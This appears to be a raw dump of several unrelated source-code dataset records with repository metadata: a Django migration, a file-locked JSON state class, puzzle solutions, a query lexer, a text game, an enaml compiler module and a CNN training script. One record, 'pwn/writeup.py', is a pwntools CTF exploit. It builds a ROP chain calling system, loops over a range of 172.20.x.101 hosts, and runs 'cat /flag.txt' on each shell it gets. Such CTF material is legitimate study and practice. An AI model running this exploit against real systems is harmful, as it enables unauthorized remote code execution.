] | 5 | 2021-09-08T03:08:46.000Z | 2022-03-12T00:56:35.000Z | angalabiri/shop/migrations/0004_productvariation_varation_type.py | me-edavids/ebiangala | 0af3de29b2afa71df3e138cd16ecddc69fbd597d | [
"MIT"
] | null | null | null | # Generated by Django 3.1.7 on 2021-03-31 22:21
from django.db import migrations, models
| 28.842105 | 201 | 0.620438 | # Generated by Django 3.1.7 on 2021-03-31 22:21
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add the ``varation_type`` choice field to ``ProductVariation``."""
    # Must apply after the product ``old_stock`` migration in the shop app.
    dependencies = [
        ('shop', '0003_product_old_stock'),
    ]
    operations = [
        migrations.AddField(
            model_name='productvariation',
            name='varation_type',
            # NOTE(review): 'varation_type' looks like a typo of
            # 'variation_type', but the name is frozen in the schema now --
            # renaming would require a follow-up migration.
            field=models.CharField(blank=True, choices=[('SIZE', 'SIZE'), ('WEIGHT', 'WEIGHT'), ('COLOR', 'COLOR')], default='SIZE', max_length=150, null=True, verbose_name='Type of Variation to add'),
        ),
    ]
| 0 | 434 | 23 |
b6614a7082de6cf37bfc2b8529705dec58d50267 | 3,410 | py | Python | sbws/util/state.py | juga0/simple-bw-scanner | fd139b89de20b6d38941f137325e05069995793b | [
"CC0-1.0"
] | 15 | 2018-09-24T00:56:19.000Z | 2022-03-30T08:47:20.000Z | sbws/util/state.py | juga0/simple-bw-scanner | fd139b89de20b6d38941f137325e05069995793b | [
"CC0-1.0"
] | 52 | 2018-10-08T08:27:38.000Z | 2020-03-09T14:40:26.000Z | sbws/util/state.py | juga0/simple-bw-scanner | fd139b89de20b6d38941f137325e05069995793b | [
"CC0-1.0"
] | 11 | 2018-10-05T16:36:44.000Z | 2021-12-29T14:47:43.000Z | from sbws.util.filelock import FileLock
import os
import json
from .json import CustomDecoder, CustomEncoder
class State:
    """Dict-like view over a JSON file.

    Every read re-loads the backing file and every write persists it, so the
    file on disk is the single source of truth shared across threads and
    processes; access goes through a file lock.

    Example::

        state = State('foo.state')   # starts as {}
        state['linux'] = True        # persisted to 'foo.state'
        state['linux']               # re-read from disk on each access
        for key in state:            # iterates the current on-disk keys
            print(key)
    """
    def get(self, key, d=None):
        """Dictionary-style ``get`` that re-reads the locked JSON file."""
        self._state = self._read()
        return self._state.get(key, d)

    def count(self, k):
        """Summarize the value stored under ``k``.

        Returns the summed counts for a list of ``[item, number]`` pairs,
        the length for a plain list, the raw value otherwise, or ``None``
        when the key is absent (or its value is falsy).
        """
        current = self.get(k)
        if not current:
            return None
        entry = self._state[k]
        if isinstance(entry, list):
            if isinstance(entry[0], list):
                return sum(pair[1] for pair in entry)
            return len(entry)
        # Non-list value: return it via get(), matching the original's
        # second read of the backing file.
        return self.get(k)
| 31 | 78 | 0.583871 | from sbws.util.filelock import FileLock
import os
import json
from .json import CustomDecoder, CustomEncoder
class State:
    """
    `json` wrapper to read a json file every time it gets a key and to write
    to the file every time a key is set.
    Every time a key is got or set, the file is locked, to atomically access
    and update the file across threads and across processes.
    >>> state = State('foo.state')
    >>> # state == {}
    >>> state['linux'] = True
    >>> # 'foo.state' now exists on disk with the JSON for {'linux': True}
    >>> # We read 'foo.state' from disk in order to get the most up-to-date
    >>> # state info. Pretend another process has updated 'linux' to be
    >>> # False
    >>> state['linux']
    >>> # returns False
    >>> # Pretend another process has added the user's age to the state file.
    >>> # As before, we read the state file from disk for the most
    >>> # up-to-date info.
    >>> state['age']
    >>> # Returns 14
    >>> # We now set their name. We read the state file first, set the option,
    >>> # and then write it out.
    >>> state['name'] = 'John'
    >>> # We can do many of the same things with a State object as with a dict
    >>> for key in state: print(key)
    >>> # Prints 'linux', 'age', and 'name'
    """
    def __init__(self, fname):
        # ``fname``: path of the backing JSON file.  A missing file reads as
        # an empty state; the file is created by the first write.
        self._fname = fname
        self._state = self._read()
    def _read(self):
        # Load the whole JSON document while holding the file lock.
        if not os.path.exists(self._fname):
            return {}
        with FileLock(self._fname):
            with open(self._fname, 'rt') as fd:
                return json.load(fd, cls=CustomDecoder)
    def _write(self):
        # Serialize the in-memory state back to disk under the file lock.
        with FileLock(self._fname):
            with open(self._fname, 'wt') as fd:
                return json.dump(self._state, fd, indent=4, cls=CustomEncoder)
    def __len__(self):
        # Re-read so the length reflects updates made by other processes.
        self._state = self._read()
        return self._state.__len__()
    def get(self, key, d=None):
        """
        Implements a dictionary ``get`` method reading and locking
        a json file.
        """
        self._state = self._read()
        return self._state.get(key, d)
    def __getitem__(self, key):
        self._state = self._read()
        return self._state.__getitem__(key)
    def __delitem__(self, key):
        # Read-modify-write.  The read and the write each take the lock
        # separately, so a concurrent update landing in between can be
        # overwritten -- the lock protects single file operations only.
        self._state = self._read()
        self._state.__delitem__(key)
        self._write()
    def __setitem__(self, key, value):
        # NOTE: important, read the file before setting the key,
        # otherwise if other instances are creating other keys, they're lost.
        self._state = self._read()
        self._state.__setitem__(key, value)
        self._write()
    def __iter__(self):
        self._state = self._read()
        return self._state.__iter__()
    def __contains__(self, item):
        self._state = self._read()
        return self._state.__contains__(item)
    def count(self, k):
        """
        Returns the length if the key value is a list
        or the sum of number if the key value is a list of list
        or the key value
        or None if the state doesn't have the key.
        """
        if self.get(k):
            if isinstance(self._state[k], list):
                if isinstance(self._state[k][0], list):
                    # list of [item, number] pairs: total the numbers
                    return sum(map(lambda x: x[1], self._state[k]))
                return len(self._state[k])
            # Non-list value: note this triggers a second disk read.
            return self.get(k)
        return None
| 1,099 | 0 | 243 |
c5492ac6722300d26d1822224e145070df8b46c3 | 918 | py | Python | day09/day09.py | alcatrazEscapee/AdventOfCode2021 | a473b01b8931791b4a1fd03bf05b286ed0ac9f85 | [
"MIT"
] | 4 | 2021-12-07T22:25:51.000Z | 2021-12-22T18:15:25.000Z | day09/day09.py | alcatrazEscapee/AdventOfCode2021 | a473b01b8931791b4a1fd03bf05b286ed0ac9f85 | [
"MIT"
] | null | null | null | day09/day09.py | alcatrazEscapee/AdventOfCode2021 | a473b01b8931791b4a1fd03bf05b286ed0ac9f85 | [
"MIT"
] | 1 | 2021-12-17T00:47:26.000Z | 2021-12-17T00:47:26.000Z | # Day 9: Smoke Basin
# Leaderboard Rank: 60 / 20
from utils import FiniteGrid, get_input
from collections import Counter
if __name__ == '__main__':
main(get_input())
| 28.6875 | 86 | 0.603486 | # Day 9: Smoke Basin
# Leaderboard Rank: 60 / 20
from utils import FiniteGrid, get_input
from collections import Counter
def main(text: str):
grid: FiniteGrid[int] = FiniteGrid.of_str(text, default='9').map_values(int)
risk = 0
for pos in grid.locations():
height = grid[pos]
if all(height < grid[adj] for adj in pos.neighbors()):
risk += 1 + height
print('Part 1:', risk)
basins = Counter() # collect the number of points that terminate in any one basin
for pos in grid.locations():
if grid[pos] != 9: # height 9 do not belong to any basin
while any(grid[low := adj] < grid[pos] for adj in pos.neighbors()):
pos = low # Step downwards until we reach a low point
basins[pos] += 1
a, b, c = basins.most_common(3)
print('Part 2:', a[1] * b[1] * c[1])
if __name__ == '__main__':
main(get_input())
| 721 | 0 | 23 |
d29f6c144da74d1fa33b5a79532d015a19b058b9 | 3,834 | py | Python | djangoql/lexer.py | Bodyhealer/djangoql | 4e95317997a9543444a1eea22c6e71710525661c | [
"MIT"
] | null | null | null | djangoql/lexer.py | Bodyhealer/djangoql | 4e95317997a9543444a1eea22c6e71710525661c | [
"MIT"
] | null | null | null | djangoql/lexer.py | Bodyhealer/djangoql | 4e95317997a9543444a1eea22c6e71710525661c | [
"MIT"
] | null | null | null | from __future__ import unicode_literals
import ply.lex as lex
from ply.lex import TOKEN
from .exceptions import DjangoQLLexerError
| 22.686391 | 76 | 0.532603 | from __future__ import unicode_literals
import ply.lex as lex
from ply.lex import TOKEN
from .exceptions import DjangoQLLexerError
class DjangoQLLexer(object):
def __init__(self, **kwargs):
self._lexer = lex.lex(module=self, **kwargs)
self.reset()
def reset(self):
self.text = ''
self._lexer.lineno = 1
return self
def input(self, s):
self.reset()
self.text = s
self._lexer.input(s)
return self
def token(self):
return self._lexer.token()
# Iterator interface
def __iter__(self):
return self
def next(self):
t = self.token()
if t is None:
raise StopIteration
return t
__next__ = next
def find_column(self, t):
"""
Returns token position in current text, starting from 1
"""
cr = max(
self.text.rfind(lt, 0, t.lexpos) for lt in self.line_terminators
)
if cr == -1:
return t.lexpos + 1
return t.lexpos - cr
whitespace = ' \t\v\f\u00A0'
line_terminators = '\n\r\u2028\u2029'
re_line_terminators = r'\n\r\u2028\u2029'
re_escaped_char = r'\\[\"\\/bfnrt]'
re_escaped_unicode = r'\\u[0-9A-Fa-f]{4}'
re_string_char = r'[^\"' + re_line_terminators + u']'
re_int_value = r'(-?0|-?[1-9][0-9]*)'
re_fraction_part = r'\.[0-9]+'
re_exponent_part = r'[eE][\+-]?[0-9]+'
tokens = [
'COMMA',
'OR',
'AND',
'NOT',
'IN',
'TRUE',
'FALSE',
'NONE',
'NAME',
'STRING_VALUE',
'FLOAT_VALUE',
'INT_VALUE',
'PAREN_L',
'PAREN_R',
'EQUALS',
'NOT_EQUALS',
'GREATER',
'GREATER_EQUAL',
'LESS',
'LESS_EQUAL',
'CONTAINS',
'NOT_CONTAINS',
'REGEX',
]
t_COMMA = ','
t_PAREN_L = r'\('
t_PAREN_R = r'\)'
t_EQUALS = '='
t_NOT_EQUALS = '!='
t_GREATER = '>'
t_GREATER_EQUAL = '>='
t_LESS = '<'
t_LESS_EQUAL = '<='
t_CONTAINS = '~'
t_NOT_CONTAINS = '!~'
t_NAME = r'[_A-Za-z][_0-9A-Za-z]*(\.[_A-Za-z][_0-9A-Za-z]*)*'
t_ignore = whitespace
@TOKEN(r'\"(' + re_escaped_char +
'|' + re_escaped_unicode +
'|' + re_string_char + r')*\"')
def t_STRING_VALUE(self, t):
t.value = t.value[1:-1] # cut leading and trailing quotes ""
return t
@TOKEN(re_int_value + re_fraction_part + re_exponent_part + '|' +
re_int_value + re_fraction_part + '|' +
re_int_value + re_exponent_part)
def t_FLOAT_VALUE(self, t):
return t
@TOKEN(re_int_value)
def t_INT_VALUE(self, t):
return t
not_followed_by_name = '(?![_0-9A-Za-z])'
@TOKEN('or' + not_followed_by_name)
def t_OR(self, t):
return t
@TOKEN('and' + not_followed_by_name)
def t_AND(self, t):
return t
@TOKEN('not' + not_followed_by_name)
def t_NOT(self, t):
return t
@TOKEN('in' + not_followed_by_name)
def t_IN(self, t):
return t
@TOKEN('regex' + not_followed_by_name)
def t_REGEX(self, t):
return t
@TOKEN('True' + not_followed_by_name)
def t_TRUE(self, t):
return t
@TOKEN('False' + not_followed_by_name)
def t_FALSE(self, t):
return t
@TOKEN('None' + not_followed_by_name)
def t_NONE(self, t):
return t
def t_error(self, t):
raise DjangoQLLexerError(
message='Illegal character %s' % repr(t.value[0]),
value=t.value,
line=t.lineno,
column=self.find_column(t),
)
@TOKEN('[' + re_line_terminators + ']+')
def t_newline(self, t):
t.lexer.lineno += len(t.value)
return
| 898 | 2,779 | 23 |
f1ca6994cfa86a641058969e3ef4a37d988330ff | 3,539 | py | Python | Python3-Learn/AdventureWithRio.py | nikhiljain-413/Hacktoberfest2021_beginner | 56b008c9ed294c3fc23b44fa13faced99948236d | [
"MIT"
] | 65 | 2021-10-01T07:02:29.000Z | 2022-03-23T10:41:37.000Z | Python3-Learn/AdventureWithRio.py | nikhiljain-413/Hacktoberfest2021_beginner | 56b008c9ed294c3fc23b44fa13faced99948236d | [
"MIT"
] | 82 | 2021-10-01T14:21:42.000Z | 2022-03-29T03:43:58.000Z | Python3-Learn/AdventureWithRio.py | nikhiljain-413/Hacktoberfest2021_beginner | 56b008c9ed294c3fc23b44fa13faced99948236d | [
"MIT"
] | 210 | 2021-10-01T07:02:39.000Z | 2022-03-27T17:41:00.000Z | #AUTHOR: Rio Cantre
#Python3 Concept: Adventure Game
#GITHUB: https://github.com/RioCantre
import time
import random
weather = ["sunny", "rainy", "stormy", "windy", "snowy", "dark"]
ambience = random.choice(weather)
tools = ["flashlight", "stick", "bat", "gun", "phone", "knife"]
weapon = random.choice(tools)
emotions = ["scared", "tired", "nervours", "crying", "sweating"]
condition = random.choice(emotions)
play_game()
| 32.768519 | 76 | 0.631534 | #AUTHOR: Rio Cantre
#Python3 Concept: Adventure Game
#GITHUB: https://github.com/RioCantre
import time
import random
weather = ["sunny", "rainy", "stormy", "windy", "snowy", "dark"]
ambience = random.choice(weather)
tools = ["flashlight", "stick", "bat", "gun", "phone", "knife"]
weapon = random.choice(tools)
emotions = ["scared", "tired", "nervours", "crying", "sweating"]
condition = random.choice(emotions)
def print_pause(message_to_print):
print(message_to_print)
time.sleep(0.2)
def intro():
print_pause("You woke up from your nap.")
print_pause("It's a " + ambience + " afternoon.")
print_pause("You heard a strange noise coming from the backyard.")
print_pause("The noise is getting more bolder and louder.")
print_pause("You are so curious.\n")
def first_move():
print_pause("You grab a " + weapon + " and head towards the back door.")
print_pause("You sneak to the backdoor slowly and smoothly.")
print_pause("As you get closer the noise seems so familiar.")
choice = input("Would you run away? yes or no?")
if choice == "no":
print_pause("It's the same wild Boar from yesterday.")
print_pause("It stopped eating the sack of potatoes on the floor.")
print_pause("It looked around and finally saw you.")
print_pause("Both of you are staring.")
attack = input("Initiate attack? yes or no?")
if attack == "yes":
print_pause("You lift up your hand with your " +
weapon + " and smash it on the wall.")
print_pause("The boar run away as quickly as it can.")
if attack == "no":
print_pause("The boar growl and roar. Trying to scare you.")
print_pause("As you lift your hand, it run away quickly.")
conclusion()
elif choice == "yes":
print_pause("You run fast heading back and close the door.")
conclusion()
else:
print_pause("You're a warrior.\n")
conclusion()
def second_move():
print_pause("You grab your keys and lock the back door.")
print_pause("You called someone and told them to come and get you.")
print_pause("You were " + condition + " and waiting for help to come.")
print_pause("The noise suddenly stop.")
print_pause("You calm down and went out of bed.")
next_step = input("Would you like to continue or no?")
if next_step == "continue":
print_pause("You went slowy heading to the backdoor.")
print_pause("Your dog suddenly appeared behind you.")
print_pause("That surprises you and felt relief.")
conclusion()
elif next_step == "no":
print_pause("You stayed in bed and went back to sleep.")
conclusion()
else:
print_pause("continue or no?\n")
conclusion()
def reaction():
print_pause("Enter 1 to go out and investigate.")
print_pause("Enter 2 to lock the door and call for help.")
print_pause("What will you do?")
moves = input("(Please enter 1 or 2.)\n")
if moves == "1":
first_move()
elif moves == "2":
second_move()
else:
conclusion()
def conclusion():
play_again = input("Would you like to restart? yes or no?\n")
if play_again == "yes":
print_pause("Okay, mighty warrior.")
reaction()
elif play_again == "no":
print_pause("You're a brave warrior.")
else:
print_pause("Please enter yes or no.")
conclusion()
def play_game():
intro()
reaction()
play_game()
| 2,942 | 0 | 161 |
44dd6ee2425f137fd9c53b0be99c6741efb74649 | 1,596 | py | Python | tests/test_day17_2.py | pcalg/AdventOfCode2019 | 93b55414c7ad13d2d74d1dea1df98dd481b94d5a | [
"MIT"
] | null | null | null | tests/test_day17_2.py | pcalg/AdventOfCode2019 | 93b55414c7ad13d2d74d1dea1df98dd481b94d5a | [
"MIT"
] | 6 | 2020-02-04T20:45:02.000Z | 2020-02-04T20:45:03.000Z | tests/test_day17_2.py | pcalg/AdventOfCode2019 | 93b55414c7ad13d2d74d1dea1df98dd481b94d5a | [
"MIT"
] | null | null | null | from app.day17_2 import cross2d
from app.day17_2 import len_route
from app.day17_2 import all_sub_lists
from app.day17_2 import possible_register_values
from app.day17_2 import has_possible_route
| 37.116279 | 93 | 0.464286 | from app.day17_2 import cross2d
from app.day17_2 import len_route
from app.day17_2 import all_sub_lists
from app.day17_2 import possible_register_values
from app.day17_2 import has_possible_route
class TestDay17_2:
    """Unit tests for the day-17 part-2 path/route helpers in app.day17_2."""
    def test_cross2d(self):
        """2-D cross product sign for the four unit-vector turn cases."""
        assert cross2d((0, 1), (1, 0)) == -1
        assert cross2d((0, 1), (0, 1)) == 0
        assert cross2d((0, 1), (-1, 0)) == 1
        assert cross2d((1, 0), (0, 1)) == 1
        assert cross2d((1, 0), (0, -1)) == -1
        assert cross2d((-1, 0), (0, 1)) == -1
        assert cross2d((-1, 0), (0, -1)) == 1
    def test_len_route(self):
        """Encoded length of a (turn, distance) route; empty route is 0."""
        assert len_route([]) == 0
        assert len_route([('R', 1)]) == 3
        assert len_route([('R', 1), ('L', 33), ('R', 9)]) == 12
    def test_all_sub_lists(self):
        """All contiguous sub-lists, ordered by start index then length."""
        assert list(all_sub_lists([('R', 1), ('L', 33), ('R', 9)])) == \
               [[('R', 1)],
                [('R', 1), ('L', 33)],
                [('R', 1), ('L', 33), ('R', 9)],
                [('L', 33)],
                [('L', 33), ('R', 9)],
                [('R', 9)]]
    def test_possible_register_values(self):
        """Candidate register triples include a known decomposition."""
        possible_values = list(possible_register_values([('R', 1), ('L', 33), ('R', 9)]))
        assert len(possible_values) == 20
        assert ([('R', 1), ('L', 33)], [('L', 33)], [('L', 33), ('R', 9)]) in possible_values
    def test_has_possible_route(self):
        """A route expressible from the given registers yields its action indices."""
        res, actions = has_possible_route([('R', 1), ('L', 33), ('R', 9), ('R', 9)],
                                          [[('R', 9)], [('R', 1), ('L', 33)], []])
        assert res == True
        assert actions == [1, 0, 0]
| 1,244 | -3 | 158 |
1bebd0e161e5d84621069a3146b89b69793f068a | 508 | py | Python | biopanning_data_bank/bdb_tables/sotmc.py | griffinclausen/bdb | 5b29995ebf399ce47a874984bd6e9eec879327b8 | [
"MIT"
] | null | null | null | biopanning_data_bank/bdb_tables/sotmc.py | griffinclausen/bdb | 5b29995ebf399ce47a874984bd6e9eec879327b8 | [
"MIT"
] | 1 | 2021-06-01T23:26:15.000Z | 2021-06-01T23:26:15.000Z | biopanning_data_bank/bdb_tables/sotmc.py | griffinclausen/bdb | 5b29995ebf399ce47a874984bd6e9eec879327b8 | [
"MIT"
] | null | null | null | from biopanning_data_bank.bdb_tables.tables import (
BDB_Entry, BDB_Database)
from biopanning_data_bank.bdb_tables.fields import (
SOTMC_FIELDS)
class SOTMC(BDB_Entry):
"""
SOTMC entry container from Biopanning Data Bank SOTMC Database.
"""
| 23.090909 | 67 | 0.688976 | from biopanning_data_bank.bdb_tables.tables import (
BDB_Entry, BDB_Database)
from biopanning_data_bank.bdb_tables.fields import (
SOTMC_FIELDS)
class SOTMCDatabase(BDB_Database):
    """
    SOTMC database container: binds the SOTMC field layout to the generic
    BDB_Database behaviour.
    """
    def __init__(self, entries):
        # Set the field layout before delegating; the base class presumably
        # reads self.fields while processing ``entries`` -- confirm upstream.
        self.fields = SOTMC_FIELDS
        super().__init__(entries)
class SOTMC(BDB_Entry):
    """
    SOTMC entry container from Biopanning Data Bank SOTMC Database.
    """
    def __init__(self, tree):
        # Attach the SOTMC field layout, then delegate ``tree`` handling to
        # the BDB_Entry base class.
        self.fields = SOTMC_FIELDS
        super().__init__(tree)
| 146 | 13 | 77 |
57a23ec08a099a9c054fd60256f6bc69af42a90b | 6,268 | py | Python | enaml/core/block_compiler.py | xtuzy/enaml | a1b5c0df71c665b6ef7f61d21260db92d77d9a46 | [
"BSD-3-Clause-Clear"
] | 1,080 | 2015-01-04T14:29:34.000Z | 2022-03-29T05:44:51.000Z | enaml/core/block_compiler.py | xtuzy/enaml | a1b5c0df71c665b6ef7f61d21260db92d77d9a46 | [
"BSD-3-Clause-Clear"
] | 308 | 2015-01-05T22:44:13.000Z | 2022-03-30T21:19:18.000Z | enaml/core/block_compiler.py | xtuzy/enaml | a1b5c0df71c665b6ef7f61d21260db92d77d9a46 | [
"BSD-3-Clause-Clear"
] | 123 | 2015-01-25T16:33:48.000Z | 2022-02-25T19:57:10.000Z | #------------------------------------------------------------------------------
# Copyright (c) 2013-2017, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
#------------------------------------------------------------------------------
from atom.api import Typed
from . import compiler_common as cmn
class BaseBlockCompiler(cmn.CompilerBase):
""" The base class of the block compilers.
"""
#: The set of local names for the compiler.
local_names = Typed(set, ())
#: A mapping of ast node -> compiler node index for the block.
index_map = Typed(dict, ())
def parent_index(self):
""" Get the node index for the parent node.
Returns
-------
result : int
The compiler node index for the node represented by the
current parent ast node.
"""
return self.index_map[self.ancestor()]
class FirstPassBlockCompiler(BaseBlockCompiler):
""" The first pass block compiler.
This is a base class for the first pass compilers for the enamldef
and template block definitions.
"""
#: A mapping of auxiliary ast node -> compiler node index.
aux_index_map = Typed(dict, ())
class SecondPassBlockCompiler(BaseBlockCompiler):
""" The second pass block compiler.
This is a base class for the second pass compilers for the enamldef
and template block definitions.
"""
| 33.164021 | 79 | 0.628271 | #------------------------------------------------------------------------------
# Copyright (c) 2013-2017, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
#------------------------------------------------------------------------------
from atom.api import Typed
from . import compiler_common as cmn
class BaseBlockCompiler(cmn.CompilerBase):
""" The base class of the block compilers.
"""
#: The set of local names for the compiler.
local_names = Typed(set, ())
#: A mapping of ast node -> compiler node index for the block.
index_map = Typed(dict, ())
def parent_index(self):
""" Get the node index for the parent node.
Returns
-------
result : int
The compiler node index for the node represented by the
current parent ast node.
"""
return self.index_map[self.ancestor()]
class FirstPassBlockCompiler(BaseBlockCompiler):
""" The first pass block compiler.
This is a base class for the first pass compilers for the enamldef
and template block definitions.
"""
#: A mapping of auxiliary ast node -> compiler node index.
aux_index_map = Typed(dict, ())
def visit_ChildDef(self, node):
# Claim the index for the compiler node.
index = len(self.index_map)
self.index_map[node] = index
# Setup the line number for the child def.
cg = self.code_generator
cg.set_lineno(node.lineno)
# Generate the child def compiler node.
cmn.gen_child_def_node(cg, node, self.local_names)
# Store the compiler node in the node list.
cmn.store_node(cg, index)
# Append the compiler node to the parent node.
cmn.append_node(cg, self.parent_index(), index)
# Visit the body of the child def.
for item in node.body:
self.visit(item)
def visit_TemplateInst(self, node):
# No pragmas are supported yet for template inst nodes.
cmn.warn_pragmas(node, self.filename)
# Claim the index for the compiler node.
index = len(self.index_map)
self.index_map[node] = index
# Setup the line number for the template inst.
cg = self.code_generator
cg.set_lineno(node.lineno)
# Generate the template inst compiler node.
cmn.gen_template_inst_node(cg, node, self.local_names)
# Store the compiler node in the node list.
cmn.store_node(cg, index)
# Append the compiler node to the parent node.
cmn.append_node(cg, self.parent_index(), index)
# Visit the body of the template inst.
for item in node.body:
self.visit(item)
def visit_TemplateInstBinding(self, node):
# Grab the index of the parent node for later use.
self.aux_index_map[node] = self.parent_index()
def visit_Binding(self, node):
# Grab the index of the parent node for later use.
self.aux_index_map[node] = self.parent_index()
def visit_ExBinding(self, node):
# Grab the index of the parent node for later use.
self.aux_index_map[node] = self.parent_index()
def visit_AliasExpr(self, node):
# Grab the index of the parent node for later use.
self.aux_index_map[node] = self.parent_index()
def visit_StorageExpr(self, node):
# Grab the index of the parent node for later use.
self.aux_index_map[node] = self.parent_index()
def visit_FuncDef(self, node):
# Grab the index of the parent node for later use.
self.aux_index_map[node] = self.parent_index()
def visit_AsyncFuncDef(self, node):
# Grab the index of the parent node for later use.
self.aux_index_map[node] = self.parent_index()
class SecondPassBlockCompiler(BaseBlockCompiler):
""" The second pass block compiler.
This is a base class for the second pass compilers for the enamldef
and template block definitions.
"""
def visit_ChildDef(self, node):
# Visit the body of the child def.
for item in node.body:
self.visit(item)
def visit_TemplateInst(self, node):
if node.body:
# Create the unpack map.
cg = self.code_generator
index = self.index_map[node]
cmn.load_helper(cg, 'make_unpack_map')
cmn.load_node(cg, index)
cg.call_function(1)
cg.store_fast(cmn.UNPACK_MAP)
# Visit the body of the template inst.
for item in node.body:
self.visit(item)
def visit_TemplateInstBinding(self, node):
# Generate the code for the template inst binding.
cg = self.code_generator
index = self.parent_index()
cmn.gen_template_inst_binding(cg, node, index)
def visit_Binding(self, node):
# Generate the code for the operator binding.
cg = self.code_generator
index = self.parent_index()
cmn.gen_operator_binding(cg, node.expr, index, node.name)
def visit_ExBinding(self, node):
# Generate the code for the operator binding.
cg = self.code_generator
index = self.parent_index()
cmn.gen_operator_binding(cg, node.expr, index, node.chain)
def visit_AliasExpr(self, node):
# Generate the code for the alias expression.
cg = self.code_generator
index = self.parent_index()
cmn.gen_alias_expr(cg, node, index)
def visit_StorageExpr(self, node):
# Generate the code for the storage expression.
cg = self.code_generator
index = self.parent_index()
cmn.gen_storage_expr(cg, node, index, self.local_names)
if node.expr is not None:
cmn.gen_operator_binding(cg, node.expr, index, node.name)
def visit_FuncDef(self, node):
# Generate the code for the function declaration.
cg = self.code_generator
index = self.parent_index()
cmn.gen_decl_funcdef(cg, node, index)
def visit_AsyncFuncDef(self, node):
# Generate the code for the async function declaration.
self.visit_FuncDef(node)
| 4,269 | 0 | 485 |
e7bda1f0e2ab84fc86e9229ca20b8b5215ecebd9 | 46 | py | Python | deidentify/tokenizer/__init__.py | bbieniek/deidentify | 7021bf0540e0a7f931e65544d12a2909c79a14eb | [
"MIT"
] | 64 | 2020-01-16T16:20:47.000Z | 2022-03-31T12:59:19.000Z | deidentify/tokenizer/__init__.py | HabibMrad/deidentify | d8960a74c852a71b29a6ee0fd6a3cf7f946a5f60 | [
"MIT"
] | 14 | 2020-01-28T08:47:06.000Z | 2022-02-12T08:32:12.000Z | deidentify/tokenizer/__init__.py | HabibMrad/deidentify | d8960a74c852a71b29a6ee0fd6a3cf7f946a5f60 | [
"MIT"
] | 12 | 2020-01-21T07:54:04.000Z | 2022-02-19T06:42:53.000Z | from .base import Tokenizer, TokenizerFactory
| 23 | 45 | 0.847826 | from .base import Tokenizer, TokenizerFactory
| 0 | 0 | 0 |
1371183d26f36f81df8c25639f4523c744c2c32b | 1,682 | py | Python | pwn/writeup.py | GinkgoTeam/2019YJTZB | 7acb23f145ff70e09baade92e6b5a65856b36a1e | [
"MIT"
] | 41 | 2019-05-13T14:22:58.000Z | 2021-11-12T03:30:10.000Z | pwn/writeup.py | GinkgoTeam/2019YJTZB | 7acb23f145ff70e09baade92e6b5a65856b36a1e | [
"MIT"
] | null | null | null | pwn/writeup.py | GinkgoTeam/2019YJTZB | 7acb23f145ff70e09baade92e6b5a65856b36a1e | [
"MIT"
] | 10 | 2019-05-13T22:49:22.000Z | 2021-02-16T20:33:32.000Z | from pwn import *
import requests
import time
import re
for i in range(101,125):
try:
ip='172.20.{}.101'.format(str(i))
flag=main(ip)
print ip,flag
time.sleep(11)
except:
print 'wrong' | 18.086022 | 41 | 0.631391 | from pwn import *
import requests
import time
import re
def main(ip):
p=remote(ip,10000)
elf=ELF('./calculator')
system_addr=elf.symbols['system']
binsh_addr=0x006020A0
poprdi=0x00400ec3
poprsi=0x400ec1
frmst_addr=0x400FD2
scanf_plt=elf.symbols['__isoc99_scanf']
#context.log_level='debug'
def fillchar(payload):
p.recvuntil('operation:\n\n')
p.sendline('1')
p.recvuntil('x:\n')
p.sendline(str(payload))
p.recvuntil('y:\n')
p.sendline('0')
def sendpayload(payload):
p.recvuntil('operation:\n\n')
p.sendline('1')
p.recvuntil('x:\n')
p.sendline(str(payload))
p.recvuntil('y:\n')
p.sendline('0')
p.recvuntil('operation:\n\n')
p.sendline('1')
p.recvuntil('x:\n')
p.sendline('0')
p.recvuntil('y:\n')
p.sendline('0')
def savepayload():
p.recvuntil('operation:\n\n')
p.sendline('5')
def exp():
p.recvuntil('calculations:')
p.sendline(str(100))
for i in range(62):
fillchar(0)
#sendpayload(0x400a1f)
#gdb.attach(p)
exp()
sendpayload(poprdi)
sendpayload(frmst_addr)
sendpayload(poprsi)
sendpayload(binsh_addr)
sendpayload(0)
#0.&a.shu
sendpayload(scanf_plt)
sendpayload(poprdi)
sendpayload(binsh_addr)
sendpayload(system_addr)
savepayload()
binsh='sh'+'\x00'
print len(binsh)
binsh=binsh.ljust(8,'\x00')
print len(binsh)
dudu=u64(binsh)
p.send(str(dudu))
p.sendline('\n')
p.sendline('cat /flag.txt')
flag=p.recv()
return flag
p.close()
for i in range(101,125):
try:
ip='172.20.{}.101'.format(str(i))
flag=main(ip)
print ip,flag
time.sleep(11)
except:
print 'wrong' | 1,443 | 0 | 25 |
9b6af6ffc3ebeeecd335510475daec57d7b18297 | 3,615 | py | Python | dogs-vs-cats-tf-cnn.py | sandeshrjain/DNN_helper | 1d03c794c1b54193f4a6fca177f34600c5a9c4e0 | [
"MIT"
] | null | null | null | dogs-vs-cats-tf-cnn.py | sandeshrjain/DNN_helper | 1d03c794c1b54193f4a6fca177f34600c5a9c4e0 | [
"MIT"
] | null | null | null | dogs-vs-cats-tf-cnn.py | sandeshrjain/DNN_helper | 1d03c794c1b54193f4a6fca177f34600c5a9c4e0 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Mon Mar 7 15:08:04 2022
@author: Sandesh Jain
"""
import tensorflow as tf
import numpy as np
import os
from tensorflow.keras.models import Model
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.layers import (Conv2D, Dense, Flatten, Input,
Lambda, MaxPooling2D, Dropout)
train_gen = ImageDataGenerator(rescale =1./255,
shear_range =0.2,
zoom_range = 0.2,
horizontal_flip =True)
test_gen = ImageDataGenerator(rescale = 1./255)
train_set = train_gen.flow_from_directory('C:/Users/Sandesh Jain/OneDrive/Documents/Acads_VT/SEM3/dump/dogs-vs-cats/train',
target_size=(64,64),
batch_size= 32,
class_mode='binary')
test_set = test_gen.flow_from_directory('C:/Users/Sandesh Jain/OneDrive/Documents/Acads_VT/SEM3/dump/dogs-vs-cats/test',
target_size=(64,64),
batch_size= 32,
class_mode='binary')
dc_model = build_cat_dog_model()
dc_model.fit_generator(train_set,
epochs = 30,
validation_data =test_set)
| 30.378151 | 133 | 0.526141 | # -*- coding: utf-8 -*-
"""
Created on Mon Mar 7 15:08:04 2022
@author: Sandesh Jain
"""
import tensorflow as tf
import numpy as np
